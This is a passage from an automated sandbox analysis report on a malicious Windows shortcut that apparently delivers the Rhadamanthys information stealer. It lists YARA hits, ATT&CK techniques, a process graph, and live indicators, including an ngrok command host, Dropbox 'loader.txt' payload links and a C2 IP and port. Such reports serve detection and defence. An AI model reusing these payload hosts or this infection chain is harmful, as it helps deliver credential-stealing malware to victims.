                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_0046A3FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,25_2_0046A3FC
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001A.00000003.2666979983.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2675887330.0000000003540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2790586953.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2685573009.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001A.00000003.2666979983.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.2675887330.0000000003540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2790586953.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2685573009.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		3
                      Windows Service                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		3
                      Windows Service                      		111
                      Process Injection                      		4
                      Obfuscated Files or Information                      		Security Account Manager134
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Software Packing                      		NTDS231
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture4
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets41
                      Virtualization/Sandbox Evasion                      		SSHKeylogging115
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading                      		Cached Domain Credentials12
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578254 Sample: xWpAZpLw47.lnk Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 81 ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com 2->81 83 uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com 2->83 85 7 other IPs or domains 2->85 109 Suricata IDS alerts for network traffic 2->109 111 Found malware configuration 2->111 113 Windows shortcut file (LNK) starts blacklisted processes 2->113 115 9 other signatures 2->115 14 cmd.exe 1 2->14         started        17 msedge.exe 113 418 2->17         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 129 Windows shortcut file (LNK) starts blacklisted processes 14->129 131 Suspicious powershell command line found 14->131 133 PowerShell case anomaly found 14->133 22 powershell.exe 14 28 14->22         started        27 conhost.exe 1 14->27         started        75 192.168.2.5, 2845, 443, 49703 unknown unknown 17->75 77 239.255.255.250 unknown Reserved 17->77 29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 3 other processes 17->35 79 127.0.0.1 unknown unknown 20->79 signatures6 process7 dnsIp8 87 23glcrtmzxqgwfpq3oujitt.ngrok.pizza 3.124.142.205, 443, 49704, 49835 AMAZON-02US United States 22->87 89 edge-block-www-env.dropbox-dns.com 162.125.69.15, 443, 49706, 49729 DROPBOXUS United States 22->89 91 www-env.dropbox-dns.com 162.125.69.18, 443, 49705, 49715 DROPBOXUS United States 22->91 71 C:\Users\user\AppData\Local\...\475161710.bat, DOS 22->71 dropped 121 Windows shortcut file (LNK) starts blacklisted processes 22->121 123 Loading BitLocker PowerShell Module 22->123 125 Powershell drops PE file 22->125 37 cmd.exe 22->37         started        40 msedge.exe 10 22->40         started        93 ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com 29->93 95 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 49742 GOOGLEUS United States 29->95 97 8 other IPs or domains 29->97 file9 signatures10 process11 signatures12 117 Windows shortcut file (LNK) starts blacklisted processes 37->117 119 Suspicious powershell command line found 37->119 42 powershell.exe 37->42         started        45 conhost.exe 37->45         started        47 msedge.exe 40->47         started        process13 file14 73 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, PE32 42->73 dropped 49 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe 42->49         started        53 msedge.exe 42->53         started        process15 file16 69 C:\Users\user\Documents\...\PerfectoUna.exe, PE32 49->69 dropped 101 Drops PE files to the document folder of the user 49->101 103 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->103 105 Drops large PE files 49->105 107 2 other signatures 49->107 55 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe 49->55         started        57 msedge.exe 53->57         started        signatures17 process18 process19 59 fontdrvhost.exe 55->59         started        63 WerFault.exe 55->63         started        dnsIp20 99 104.161.43.18, 2845, 49901 IOFLOODUS United States 59->99 127 Switches to a custom stack to bypass stack traces 59->127 65 fontdrvhost.exe 59->65         started        signatures21 process22 process23 67 WerFault.exe 65->67         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      xWpAZpLw47.lnk29%VirustotalBrowse
                      xWpAZpLw47.lnk100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d0%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d-UseBasicPars0%Avira URL Cloudsafe
                      https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fF0%Avira URL Cloudsafe
                      https://uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.n0%Avira URL Cloudsafe
                      https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgD0%Avira URL Cloudsafe
                      https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop0%Avira URL Cloudsafe
                      https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=10%Avira URL Cloudsafe
                      https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopkernelbasentdllkernel32GetProcessMitigatio0%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34dX0%Avira URL Cloudsafe
                      https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopx0%Avira URL Cloudsafe
                      https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=10%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza0%Avira URL Cloudsafe
                      https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com/cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=10%Avira URL Cloudsafe
                      https://permanently-removed.invalid/OAuthLogin(0%Avira URL Cloudsafe
                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      		199.232.210.172
                      		truefalse
                        		high
                        chrome.cloudflare-dns.com
                        		172.64.41.3
                        		truefalse
                          		high
                          edge-block-www-env.dropbox-dns.com
                          		162.125.69.15
                          		truefalse
                            		high
                            www-env.dropbox-dns.com
                            		162.125.69.18
                            		truefalse
                              		high
                              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                              		94.245.104.56
                              		truefalse
                                		high
                                googlehosted.l.googleusercontent.com
                                		142.250.181.65
                                		truefalse
                                  		high
                                  23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                  		3.124.142.205
                                  		truetrue
                                    		unknown
                                    clients2.googleusercontent.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      bzib.nelreports.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.dropbox.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34dtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfoptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.dropbox.com/scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1false
                                                      		high
                                                      https://www.dropbox.com/scl/fi/9t9vl9gk9xm4lc1q5j1w2/loader.txt?rlkey=2k6bvt9zpjr10kshfjrooidha&dl=1false
                                                        		high
                                                        https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                          		high
                                                          https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=1false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com/cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=1false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34dtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.dropbox.compowershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.microsoft.copowershell.exe, 00000003.00000002.2390109279.000001DAAFC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://23glcrtmzxqgwfpq3oujitt.npowershell.exe, 00000013.00000002.2533952315.000002011226D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2255511664.0000020F0F450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://app.hellosign.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dropbox.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDpowershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.docsend.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.compowershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFpowershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dropboxstatic.com/static/powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.compowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://officeapps-df.live.compowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.login.yahoo.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://office.net/msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2355291636.000001DA979E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020110BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://login.yahoo.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 